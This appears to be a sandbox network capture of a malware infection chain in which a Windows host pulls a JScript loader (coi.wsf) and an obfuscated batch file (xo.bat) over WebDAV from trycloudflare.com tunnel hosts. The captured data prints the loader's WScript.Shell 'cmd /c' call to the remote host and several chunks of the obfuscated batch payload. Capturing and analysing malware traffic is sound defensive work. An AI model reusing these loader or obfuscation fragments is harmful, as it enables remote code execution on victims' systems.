2025-03-13 10:07:34 UTC	205	OUT	Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 31 30 2e 30 2e 31 39 30 34 35 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 74 79 70 69 63 61 6c 6c 79 2d 6e 75 74 2d 70 65 72 73 6f 6e 61 6c 69 7a 65 64 2d 73 79 6e 64 69 63 61 74 69 6f 6e 2e 74 72 79 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 0d 0a 0d 0a Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045Depth: 0translate: fContent-Length: 0Host: typically-nut-personalized-syndication.trycloudflare.com
2025-03-13 10:07:35 UTC	228	IN	HTTP/1.1 207 Multi-Status Date: Thu, 13 Mar 2025 10:07:35 GMT Content-Type: application/xml; charset=utf-8 Content-Length: 782 Connection: close CF-Ray: 91fab9a4bc99e909-DFW CF-Cache-Status: DYNAMIC Server: cloudflare
2025-03-13 10:07:35 UTC	782	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d 27 55 54 46 2d 38 27 3f 3e 0a 3c 44 3a 6d 75 6c 74 69 73 74 61 74 75 73 20 78 6d 6c 6e 73 3a 44 3d 22 44 41 56 3a 22 3e 3c 44 3a 72 65 73 70 6f 6e 73 65 3e 3c 44 3a 68 72 65 66 3e 2f 3c 2f 44 3a 68 72 65 66 3e 3c 44 3a 70 72 6f 70 73 74 61 74 3e 3c 44 3a 70 72 6f 70 3e 3c 44 3a 72 65 73 6f 75 72 63 65 74 79 70 65 3e 3c 44 3a 63 6f 6c 6c 65 63 74 69 6f 6e 2f 3e 3c 2f 44 3a 72 65 73 6f 75 72 63 65 74 79 70 65 3e 3c 44 3a 63 72 65 61 74 69 6f 6e 64 61 74 65 3e 32 30 32 34 2d 31 32 2d 31 39 54 31 30 3a 34 30 3a 31 37 5a 3c 2f 44 3a 63 72 65 61 74 69 6f 6e 64 61 74 65 3e 3c 44 3a 71 75 6f 74 61 2d 75 73 65 64 2d 62 79 74 65 73 3e 31 33 35 31 35 38 37 32 36 36 35 36 3c 2f 44 Data Ascii: <?xml version='1.0' encoding='UTF-8'?><D:multistatus xmlns:D="DAV:"><D:response><D:href>/</D:href><D:propstat><D:prop><D:resourcetype><D:collection/></D:resourcetype><D:creationdate>2024-12-19T10:40:17Z</D:creationdate><D:quota-used-bytes>135158726656</D

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.10	49689	104.16.230.132	443

Timestamp	Bytes transferred	Direction	Data
2025-03-13 10:07:37 UTC	212	OUT	Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 63 6f 69 2e 77 73 66 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 31 30 2e 30 2e 31 39 30 34 35 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 74 79 70 69 63 61 6c 6c 79 2d 6e 75 74 2d 70 65 72 73 6f 6e 61 6c 69 7a 65 64 2d 73 79 6e 64 69 63 61 74 69 6f 6e 2e 74 72 79 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 0d 0a 0d 0a Data Ascii: PROPFIND /coi.wsf HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045Depth: 0translate: fContent-Length: 0Host: typically-nut-personalized-syndication.trycloudflare.com
2025-03-13 10:07:37 UTC	228	IN	HTTP/1.1 207 Multi-Status Date: Thu, 13 Mar 2025 10:07:37 GMT Content-Type: application/xml; charset=utf-8 Content-Length: 836 Connection: close CF-Ray: 91fab9b42d94a918-DFW CF-Cache-Status: DYNAMIC Server: cloudflare
2025-03-13 10:07:37 UTC	836	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d 27 55 54 46 2d 38 27 3f 3e 0a 3c 44 3a 6d 75 6c 74 69 73 74 61 74 75 73 20 78 6d 6c 6e 73 3a 44 3d 22 44 41 56 3a 22 3e 3c 44 3a 72 65 73 70 6f 6e 73 65 3e 3c 44 3a 68 72 65 66 3e 2f 63 6f 69 2e 77 73 66 3c 2f 44 3a 68 72 65 66 3e 3c 44 3a 70 72 6f 70 73 74 61 74 3e 3c 44 3a 70 72 6f 70 3e 3c 44 3a 72 65 73 6f 75 72 63 65 74 79 70 65 3e 3c 2f 44 3a 72 65 73 6f 75 72 63 65 74 79 70 65 3e 3c 44 3a 63 72 65 61 74 69 6f 6e 64 61 74 65 3e 32 30 32 35 2d 30 33 2d 31 31 54 32 33 3a 31 30 3a 30 31 5a 3c 2f 44 3a 63 72 65 61 74 69 6f 6e 64 61 74 65 3e 3c 44 3a 67 65 74 63 6f 6e 74 65 6e 74 6c 65 6e 67 74 68 3e 33 38 33 3c 2f 44 3a 67 65 74 63 6f 6e 74 65 6e 74 6c 65 6e 67 74 68 Data Ascii: <?xml version='1.0' encoding='UTF-8'?><D:multistatus xmlns:D="DAV:"><D:response><D:href>/coi.wsf</D:href><D:propstat><D:prop><D:resourcetype></D:resourcetype><D:creationdate>2025-03-11T23:10:01Z</D:creationdate><D:getcontentlength>383</D:getcontentlength

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.10	49691	104.16.230.132	443

Timestamp	Bytes transferred	Direction	Data
2025-03-13 10:07:39 UTC	221	OUT	GET /coi.wsf HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045 translate: f Host: typically-nut-personalized-syndication.trycloudflare.com
2025-03-13 10:07:40 UTC	337	IN	HTTP/1.1 200 OK Date: Thu, 13 Mar 2025 10:07:40 GMT Content-Type: application/octet-stream Content-Length: 383 Connection: close CF-Ray: 91fab9c2c9fff02e-DFW CF-Cache-Status: DYNAMIC Accept-Ranges: bytes ETag: "480eedf80857d90a40c3e0ee7c0a3615-1741734587-383" Last-Modified: Tue, 11 Mar 2025 23:09:47 GMT Server: cloudflare
2025-03-13 10:07:40 UTC	383	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 6a 6f 62 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 21 5b 43 44 41 54 41 5b 0d 0a 20 20 20 20 20 20 20 20 76 61 72 20 73 68 65 6c 6c 20 3d 20 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 22 57 53 63 72 69 70 74 2e 53 68 65 6c 6c 22 29 3b 0d 0a 20 20 20 20 20 20 20 20 74 72 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 68 65 6c 6c 2e 52 75 6e 28 22 63 6d 64 20 2f 63 20 5c 5c 5c 5c 74 79 70 69 63 61 6c 6c 79 2d 6e 75 74 2d 70 65 72 73 6f 6e 61 6c 69 7a 65 64 2d 73 79 6e 64 69 63 61 74 69 6f 6e 2e 74 72 79 63 6c 6f 75 64 66 6c 61 Data Ascii: <?xml version="1.0" encoding="UTF-8"?><job> <script language="JScript"> <![CDATA[ var shell = new ActiveXObject("WScript.Shell"); try { shell.Run("cmd /c \\\\typically-nut-personalized-syndication.trycloudfla

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.10	49694	104.16.230.132	443

Timestamp	Bytes transferred	Direction	Data
2025-03-13 10:07:42 UTC	211	OUT	Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 78 6f 2e 62 61 74 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 31 30 2e 30 2e 31 39 30 34 35 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 74 79 70 69 63 61 6c 6c 79 2d 6e 75 74 2d 70 65 72 73 6f 6e 61 6c 69 7a 65 64 2d 73 79 6e 64 69 63 61 74 69 6f 6e 2e 74 72 79 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 0d 0a 0d 0a Data Ascii: PROPFIND /xo.bat HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045Depth: 0translate: fContent-Length: 0Host: typically-nut-personalized-syndication.trycloudflare.com
2025-03-13 10:07:43 UTC	228	IN	HTTP/1.1 207 Multi-Status Date: Thu, 13 Mar 2025 10:07:43 GMT Content-Type: application/xml; charset=utf-8 Content-Length: 824 Connection: close CF-Ray: 91fab9d57c0e4683-DFW CF-Cache-Status: DYNAMIC Server: cloudflare
2025-03-13 10:07:43 UTC	824	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d 27 55 54 46 2d 38 27 3f 3e 0a 3c 44 3a 6d 75 6c 74 69 73 74 61 74 75 73 20 78 6d 6c 6e 73 3a 44 3d 22 44 41 56 3a 22 3e 3c 44 3a 72 65 73 70 6f 6e 73 65 3e 3c 44 3a 68 72 65 66 3e 2f 78 6f 2e 62 61 74 3c 2f 44 3a 68 72 65 66 3e 3c 44 3a 70 72 6f 70 73 74 61 74 3e 3c 44 3a 70 72 6f 70 3e 3c 44 3a 72 65 73 6f 75 72 63 65 74 79 70 65 3e 3c 2f 44 3a 72 65 73 6f 75 72 63 65 74 79 70 65 3e 3c 44 3a 63 72 65 61 74 69 6f 6e 64 61 74 65 3e 32 30 32 35 2d 30 33 2d 31 31 54 32 33 3a 30 39 3a 31 30 5a 3c 2f 44 3a 63 72 65 61 74 69 6f 6e 64 61 74 65 3e 3c 44 3a 67 65 74 63 6f 6e 74 65 6e 74 6c 65 6e 67 74 68 3e 33 36 32 31 36 3c 2f 44 3a 67 65 74 63 6f 6e 74 65 6e 74 6c 65 6e 67 74 Data Ascii: <?xml version='1.0' encoding='UTF-8'?><D:multistatus xmlns:D="DAV:"><D:response><D:href>/xo.bat</D:href><D:propstat><D:prop><D:resourcetype></D:resourcetype><D:creationdate>2025-03-11T23:09:10Z</D:creationdate><D:getcontentlength>36216</D:getcontentlengt

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.10	49698	104.16.230.132	443

Timestamp	Bytes transferred	Direction	Data
2025-03-13 10:07:44 UTC	220	OUT	GET /xo.bat HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045 translate: f Host: typically-nut-personalized-syndication.trycloudflare.com
2025-03-13 10:07:45 UTC	327	IN	HTTP/1.1 200 OK Date: Thu, 13 Mar 2025 10:07:45 GMT Content-Type: text/plain Content-Length: 36216 Connection: close CF-Ray: 91fab9e3dbcb3588-DFW CF-Cache-Status: DYNAMIC Accept-Ranges: bytes ETag: "4ec843a81109410ea7c4aa655b11ef03-1741734530-36216" Last-Modified: Tue, 11 Mar 2025 23:08:50 GMT Server: cloudflare
2025-03-13 10:07:45 UTC	1369	IN	Data Raw: ff fe 26 40 63 6c 73 26 40 73 65 74 20 22 c3 6c c3 4c 3d 77 59 35 6e 33 32 6f 45 44 68 57 43 41 61 54 7a 36 67 63 49 6b 38 76 20 73 75 58 4b 56 4c 34 37 39 46 47 31 4f 6d 79 51 70 66 74 65 78 4a 52 62 40 48 64 50 72 71 69 6a 6c 55 4e 53 30 42 4d 5a 22 0a 25 c3 6c c3 4c 3a 7e 34 38 2c 31 25 25 78 53 c3 73 43 c3 42 25 25 c3 6c c3 4c 3a 7e 32 34 2c 31 25 25 85 aa 48 c3 c3 7a c3 25 25 c3 6c c3 4c 3a 7e 34 33 2c 31 25 25 c3 6c c3 4c 3a 7e 34 32 2c 31 25 25 c3 6c c3 4c 3a 7e 32 33 2c 31 25 22 c3 96 b9 25 c3 6c c3 4c 3a 7e 33 36 2c 31 25 c3 3d 25 c3 6c c3 4c 3a 7e 33 34 2c 31 25 25 c3 6c c3 4c 3a 7e 31 34 2c 31 25 25 c3 6c c3 4c 3a 7e 35 35 2c 31 25 25 c3 6c c3 4c 3a 7e 32 38 2c 31 25 25 c3 6c c3 4c 3a 7e 32 34 2c 31 25 25 c3 6c c3 4c 3a 7e 33 30 2c 31 25 25 c3 Data Ascii: &@cls&@set "lL=wY5n32oEDhWCAaTz6gcIk8v suXKVL479FG1OmyQpftexJRb@HdPrqijlUNS0BMZ"%lL:~48,1%%xSsCB%%lL:~24,1%%Hz%%lL:~43,1%%lL:~42,1%%lL:~23,1%"%lL:~36,1%=%lL:~34,1%%lL:~14,1%%lL:~55,1%%lL:~28,1%%lL:~24,1%%lL:~30,1%%
2025-03-13 10:07:45 UTC	1369	IN	Data Raw: b9 4f c3 3a 7e 33 37 2c 31 25 25 c3 96 b9 4f c3 3a 7e 34 38 2c 31 25 25 c3 96 b9 4f c3 3a 7e 30 2c 31 25 25 c3 96 b9 4f c3 3a 7e 33 38 2c 31 25 25 c3 96 b9 4f c3 3a 7e 34 32 2c 31 25 25 c3 96 b9 4f c3 3a 7e 38 2c 31 25 25 c3 96 b9 4f c3 3a 7e 34 30 2c 31 25 25 c3 96 b9 4f c3 3a 7e 39 2c 31 25 25 c3 96 b9 4f c3 3a 7e 34 36 2c 31 25 25 a3 43 a5 c3 a7 89 66 25 25 c3 96 b9 4f c3 3a 7e 34 31 2c 31 25 25 c3 96 b9 4f c3 3a 7e 31 34 2c 31 25 25 c3 96 b9 4f c3 3a 7e 35 38 2c 31 25 25 c3 96 b9 4f c3 3a 7e 31 30 2c 31 25 25 c3 96 b9 4f c3 3a 7e 31 32 2c 31 25 25 c3 96 b9 4f c3 3a 7e 35 31 2c 31 25 25 4f 4e 6e a8 85 c3 9c 25 25 c3 96 b9 4f c3 3a 7e 32 38 2c 31 25 25 c3 96 b9 4f c3 3a 7e 36 2c 31 25 25 c3 96 b9 4f c3 3a 7e 35 36 2c 31 25 25 c3 c3 c3 4f ab 68 c3 25 25 Data Ascii: O:~37,1%%O:~48,1%%O:~0,1%%O:~38,1%%O:~42,1%%O:~8,1%%O:~40,1%%O:~9,1%%O:~46,1%%Cf%%O:~41,1%%O:~14,1%%O:~58,1%%O:~10,1%%O:~12,1%%O:~51,1%%ONn%%O:~28,1%%O:~6,1%%O:~56,1%%Oh%%
2025-03-13 10:07:45 UTC	1369	IN	Data Raw: 31 25 25 96 49 c3 76 69 3a 7e 34 30 2c 31 25 25 96 49 c3 76 69 3a 7e 32 37 2c 31 25 25 96 49 c3 76 69 3a 7e 35 35 2c 31 25 25 96 49 c3 76 69 3a 7e 35 32 2c 31 25 25 96 49 c3 76 69 3a 7e 31 39 2c 31 25 25 96 49 c3 76 69 3a 7e 31 35 2c 31 25 25 96 49 c3 76 69 3a 7e 32 33 2c 31 25 25 96 49 c3 76 69 3a 7e 31 32 2c 31 25 25 96 49 c3 76 69 3a 7e 35 39 2c 31 25 25 96 49 c3 76 69 3a 7e 33 39 2c 31 25 22 0a 25 c3 af 96 3a 7e 34 33 2c 31 25 25 c3 af 96 3a 7e 34 2c 31 25 25 c3 af 96 3a 7e 31 39 2c 31 25 25 c3 af 96 3a 7e 33 33 2c 31 25 25 c3 af 96 3a 7e 33 31 2c 31 25 22 87 c3 84 c3 25 c3 af 96 3a 7e 36 2c 31 25 25 6a c3 ab 84 c3 47 6c 25 3d 25 c3 af 96 3a 7e 35 35 2c 31 25 25 c3 af 96 3a 7e 35 39 2c 31 25 25 a8 c3 c3 c3 a5 c3 c3 25 25 c3 af 96 3a 7e 31 32 2c 31 25 Data Ascii: 1%%Ivi:~40,1%%Ivi:~27,1%%Ivi:~55,1%%Ivi:~52,1%%Ivi:~19,1%%Ivi:~15,1%%Ivi:~23,1%%Ivi:~12,1%%Ivi:~59,1%%Ivi:~39,1%"%:~43,1%%:~4,1%%:~19,1%%:~33,1%%:~31,1%"%:~6,1%%jGl%=%:~55,1%%:~59,1%%%%:~12,1%
2025-03-13 10:07:45 UTC	1369	IN	Data Raw: 31 25 25 87 c3 84 c3 44 3a 7e 32 30 2c 31 25 25 87 c3 84 c3 44 3a 7e 34 39 2c 31 25 25 87 c3 84 c3 44 3a 7e 35 37 2c 31 25 25 87 c3 84 c3 44 3a 7e 35 33 2c 31 25 25 87 c3 84 c3 44 3a 7e 33 39 2c 31 25 25 87 c3 84 c3 44 3a 7e 32 35 2c 31 25 25 87 c3 84 c3 44 3a 7e 34 37 2c 31 25 25 87 c3 84 c3 44 3a 7e 34 35 2c 31 25 25 87 c3 84 c3 44 3a 7e 36 2c 31 25 25 87 c3 84 c3 44 3a 7e 34 33 2c 31 25 25 87 c3 84 c3 44 3a 7e 31 37 2c 31 25 25 87 c3 84 c3 44 3a 7e 32 38 2c 31 25 25 87 c3 84 c3 44 3a 7e 36 33 2c 31 25 25 87 c3 84 c3 44 3a 7e 32 37 2c 31 25 25 87 c3 84 c3 44 3a 7e 36 32 2c 31 25 25 6c 6b 65 c3 71 53 b2 25 25 87 c3 84 c3 44 3a 7e 38 2c 31 25 25 87 c3 84 c3 44 3a 7e 35 38 2c 31 25 25 87 c3 84 c3 44 3a 7e 31 2c 31 25 25 87 c3 84 c3 44 3a 7e 34 31 2c 31 25 Data Ascii: 1%%D:~20,1%%D:~49,1%%D:~57,1%%D:~53,1%%D:~39,1%%D:~25,1%%D:~47,1%%D:~45,1%%D:~6,1%%D:~43,1%%D:~17,1%%D:~28,1%%D:~63,1%%D:~27,1%%D:~62,1%%lkeqS%%D:~8,1%%D:~58,1%%D:~1,1%%D:~41,1%
2025-03-13 10:07:45 UTC	1369	IN	Data Raw: c3 3a 7e 36 2c 31 25 25 c3 67 ac c3 3a 7e 31 30 2c 31 25 22 0a 25 55 5f 89 3a 7e 33 35 2c 31 25 25 55 5f 89 3a 7e 35 30 2c 31 25 25 55 5f 89 3a 7e 34 31 2c 31 25 25 55 5f 89 3a 7e 35 39 2c 31 25 25 55 5f 89 3a 7e 35 38 2c 31 25 22 25 55 5f 89 3a 7e 35 30 2c 31 25 c3 25 55 5f 89 3a 7e 31 32 2c 31 25 c3 91 3d 25 55 5f 89 3a 7e 33 33 2c 31 25 25 54 62 c3 b6 79 c3 43 25 25 55 5f 89 3a 7e 36 30 2c 31 25 25 55 5f 89 3a 7e 33 34 2c 31 25 25 c3 71 c3 9c 46 89 b2 25 25 55 5f 89 3a 7e 34 37 2c 31 25 25 55 5f 89 3a 7e 35 36 2c 31 25 25 55 5f 89 3a 7e 34 2c 31 25 25 55 5f 89 3a 7e 36 2c 31 25 25 55 5f 89 3a 7e 35 2c 31 25 25 55 5f 89 3a 7e 31 38 2c 31 25 25 55 5f 89 3a 7e 32 31 2c 31 25 25 55 5f 89 3a 7e 38 2c 31 25 25 55 5f 89 3a 7e 36 32 2c 31 25 25 55 5f 89 3a 7e Data Ascii: :~6,1%%g:~10,1%"%U_:~35,1%%U_:~50,1%%U_:~41,1%%U_:~59,1%%U_:~58,1%"%U_:~50,1%%U_:~12,1%=%U_:~33,1%%TbyC%%U_:~60,1%%U_:~34,1%%qF%%U_:~47,1%%U_:~56,1%%U_:~4,1%%U_:~6,1%%U_:~5,1%%U_:~18,1%%U_:~21,1%%U_:~8,1%%U_:~62,1%%U_:~
2025-03-13 10:07:45 UTC	1369	IN	Data Raw: 73 c3 71 c3 91 3a 7e 31 34 2c 31 25 25 73 c3 71 c3 91 3a 7e 33 35 2c 31 25 25 ab c3 c3 c3 6b c3 c3 25 25 73 c3 71 c3 91 3a 7e 31 31 2c 31 25 25 73 c3 71 c3 91 3a 7e 36 31 2c 31 25 25 73 c3 71 c3 91 3a 7e 35 31 2c 31 25 25 73 c3 71 c3 91 3a 7e 34 36 2c 31 25 25 73 c3 71 c3 91 3a 7e 32 2c 31 25 25 73 c3 71 c3 91 3a 7e 32 32 2c 31 25 25 73 c3 71 c3 91 3a 7e 33 2c 31 25 25 73 c3 71 c3 91 3a 7e 32 33 2c 31 25 25 73 c3 71 c3 91 3a 7e 35 36 2c 31 25 25 73 c3 71 c3 91 3a 7e 31 35 2c 31 25 25 73 c3 71 c3 91 3a 7e 33 34 2c 31 25 25 73 c3 71 c3 91 3a 7e 32 38 2c 31 25 25 73 c3 71 c3 91 3a 7e 35 2c 31 25 25 73 c3 71 c3 91 3a 7e 35 34 2c 31 25 25 73 c3 71 c3 91 3a 7e 32 36 2c 31 25 25 73 c3 71 c3 91 3a 7e 31 38 2c 31 25 25 73 c3 71 c3 91 3a 7e 36 32 2c 31 25 25 73 c3 Data Ascii: sq:~14,1%%sq:~35,1%%k%%sq:~11,1%%sq:~61,1%%sq:~51,1%%sq:~46,1%%sq:~2,1%%sq:~22,1%%sq:~3,1%%sq:~23,1%%sq:~56,1%%sq:~15,1%%sq:~34,1%%sq:~28,1%%sq:~5,1%%sq:~54,1%%sq:~26,1%%sq:~18,1%%sq:~62,1%%s
2025-03-13 10:07:45 UTC	1369	IN	Data Raw: 7e 33 2c 31 25 25 c3 c3 c3 50 3a 7e 31 38 2c 31 25 25 c3 c3 c3 50 3a 7e 33 34 2c 31 25 25 c3 c3 c3 50 3a 7e 32 33 2c 31 25 25 c3 c3 c3 50 3a 7e 34 38 2c 31 25 22 bb 25 c3 c3 c3 50 3a 7e 31 2c 31 25 25 c3 c3 c3 50 3a 7e 35 37 2c 31 25 b9 25 c3 c3 c3 50 3a 7e 33 37 2c 31 25 3d 25 c3 c3 c3 50 3a 7e 33 39 2c 31 25 25 c3 c3 c3 50 3a 7e 32 37 2c 31 25 25 c3 c3 c3 50 3a 7e 33 34 2c 31 25 25 c3 c3 c3 50 3a 7e 32 31 2c 31 25 25 c3 c3 c3 50 3a 7e 34 38 2c 31 25 25 c3 c3 c3 50 3a 7e 35 35 2c 31 25 25 c3 c3 c3 50 3a 7e 39 2c 31 25 25 c3 c3 c3 50 3a 7e 31 39 2c 31 25 25 c3 c3 c3 50 3a 7e 33 37 2c 31 25 25 9c 49 72 78 63 44 89 25 25 c3 c3 c3 50 3a 7e 34 34 2c 31 25 25 4b ad c3 52 6d 59 4a 25 25 c3 c3 c3 50 3a 7e 34 39 2c 31 25 25 c3 c3 c3 50 3a 7e 32 39 2c 31 25 25 c3 Data Ascii: ~3,1%%P:~18,1%%P:~34,1%%P:~23,1%%P:~48,1%"%P:~1,1%%P:~57,1%%P:~37,1%=%P:~39,1%%P:~27,1%%P:~34,1%%P:~21,1%%P:~48,1%%P:~55,1%%P:~9,1%%P:~19,1%%P:~37,1%%IrxcD%%P:~44,1%%KRmYJ%%P:~49,1%%P:~29,1%%
2025-03-13 10:07:45 UTC	1369	IN	Data Raw: 3a 7e 36 33 2c 31 25 25 bb 41 69 b9 62 3a 7e 30 2c 31 25 25 bb 41 69 b9 62 3a 7e 32 31 2c 31 25 25 bb 41 69 b9 62 3a 7e 32 35 2c 31 25 25 bb 41 69 b9 62 3a 7e 32 32 2c 31 25 25 bb 41 69 b9 62 3a 7e 34 2c 31 25 25 bb 41 69 b9 62 3a 7e 35 32 2c 31 25 25 bb 41 69 b9 62 3a 7e 38 2c 31 25 25 bb 41 69 b9 62 3a 7e 35 38 2c 31 25 25 bb 41 69 b9 62 3a 7e 34 38 2c 31 25 25 55 66 a0 c3 b4 70 75 25 25 bb 41 69 b9 62 3a 7e 35 35 2c 31 25 25 bb 41 69 b9 62 3a 7e 37 2c 31 25 25 bb 41 69 b9 62 3a 7e 33 2c 31 25 25 bb 41 69 b9 62 3a 7e 36 32 2c 31 25 25 bb 41 69 b9 62 3a 7e 33 39 2c 31 25 25 bb 41 69 b9 62 3a 7e 34 30 2c 31 25 25 bb 41 69 b9 62 3a 7e 34 32 2c 31 25 25 bb 41 69 b9 62 3a 7e 34 35 2c 31 25 25 bb 41 69 b9 62 3a 7e 35 2c 31 25 25 bb 41 69 b9 62 3a 7e 34 34 2c Data Ascii: :~63,1%%Aib:~0,1%%Aib:~21,1%%Aib:~25,1%%Aib:~22,1%%Aib:~4,1%%Aib:~52,1%%Aib:~8,1%%Aib:~58,1%%Aib:~48,1%%Ufpu%%Aib:~55,1%%Aib:~7,1%%Aib:~3,1%%Aib:~62,1%%Aib:~39,1%%Aib:~40,1%%Aib:~42,1%%Aib:~45,1%%Aib:~5,1%%Aib:~44,
2025-03-13 10:07:45 UTC	1369	IN	Data Raw: a8 85 4c a1 a4 3a 7e 36 2c 31 25 25 a8 85 4c a1 a4 3a 7e 34 31 2c 31 25 22 0a 25 58 ad ba 87 3a 7e 31 33 2c 31 25 25 58 ad ba 87 3a 7e 33 33 2c 31 25 25 58 ad ba 87 3a 7e 35 38 2c 31 25 25 58 ad ba 87 3a 7e 31 35 2c 31 25 25 58 ad ba 87 3a 7e 33 30 2c 31 25 22 25 58 ad ba 87 3a 7e 34 30 2c 31 25 c3 ac c3 c3 3d 25 58 ad ba 87 3a 7e 35 2c 31 25 25 58 ad ba 87 3a 7e 32 39 2c 31 25 25 58 ad ba 87 3a 7e 32 34 2c 31 25 25 58 ad ba 87 3a 7e 31 37 2c 31 25 25 58 ad ba 87 3a 7e 33 32 2c 31 25 25 58 ad ba 87 3a 7e 31 36 2c 31 25 25 58 ad ba 87 3a 7e 34 39 2c 31 25 25 58 ad ba 87 3a 7e 34 33 2c 31 25 25 58 ad ba 87 3a 7e 36 31 2c 31 25 25 58 ad ba 87 3a 7e 30 2c 31 25 25 58 ad ba 87 3a 7e 34 32 2c 31 25 25 58 ad ba 87 3a 7e 33 33 2c 31 25 25 58 ad ba 87 3a 7e 34 35 Data Ascii: L:~6,1%%L:~41,1%"%X:~13,1%%X:~33,1%%X:~58,1%%X:~15,1%%X:~30,1%"%X:~40,1%=%X:~5,1%%X:~29,1%%X:~24,1%%X:~17,1%%X:~32,1%%X:~16,1%%X:~49,1%%X:~43,1%%X:~61,1%%X:~0,1%%X:~42,1%%X:~33,1%%X:~45
2025-03-13 10:07:45 UTC	1369	IN	Data Raw: 31 25 25 56 c3 ac c3 c3 3a 7e 32 2c 31 25 25 56 c3 ac c3 c3 3a 7e 33 32 2c 31 25 25 56 c3 ac c3 c3 3a 7e 35 33 2c 31 25 25 56 c3 ac c3 c3 3a 7e 34 31 2c 31 25 25 56 c3 ac c3 c3 3a 7e 31 35 2c 31 25 25 56 c3 ac c3 c3 3a 7e 35 2c 31 25 25 56 c3 ac c3 c3 3a 7e 34 36 2c 31 25 25 56 c3 ac c3 c3 3a 7e 33 30 2c 31 25 25 56 c3 ac c3 c3 3a 7e 35 32 2c 31 25 25 56 c3 ac c3 c3 3a 7e 31 30 2c 31 25 25 56 c3 ac c3 c3 3a 7e 34 2c 31 25 25 56 c3 ac c3 c3 3a 7e 35 31 2c 31 25 25 56 c3 ac c3 c3 3a 7e 35 37 2c 31 25 25 56 c3 ac c3 c3 3a 7e 34 34 2c 31 25 25 56 c3 ac c3 c3 3a 7e 36 2c 31 25 25 56 c3 ac c3 c3 3a 7e 30 2c 31 25 25 b2 c3 b4 c3 50 a3 bc 25 25 56 c3 ac c3 c3 3a 7e 38 2c 31 25 25 56 c3 ac c3 c3 3a 7e 32 36 2c 31 25 25 56 c3 ac c3 c3 3a 7e 33 38 2c 31 25 25 56 c3 Data Ascii: 1%%V:~2,1%%V:~32,1%%V:~53,1%%V:~41,1%%V:~15,1%%V:~5,1%%V:~46,1%%V:~30,1%%V:~52,1%%V:~10,1%%V:~4,1%%V:~51,1%%V:~57,1%%V:~44,1%%V:~6,1%%V:~0,1%%P%%V:~8,1%%V:~26,1%%V:~38,1%%V

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.10	53106	104.16.230.132	443

Timestamp	Bytes transferred	Direction	Data
2025-03-13 10:07:49 UTC	162	OUT	OPTIONS / HTTP/1.1 Connection: Keep-Alive User-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045 translate: f Host: nissan-signature-rs-noise.trycloudflare.com
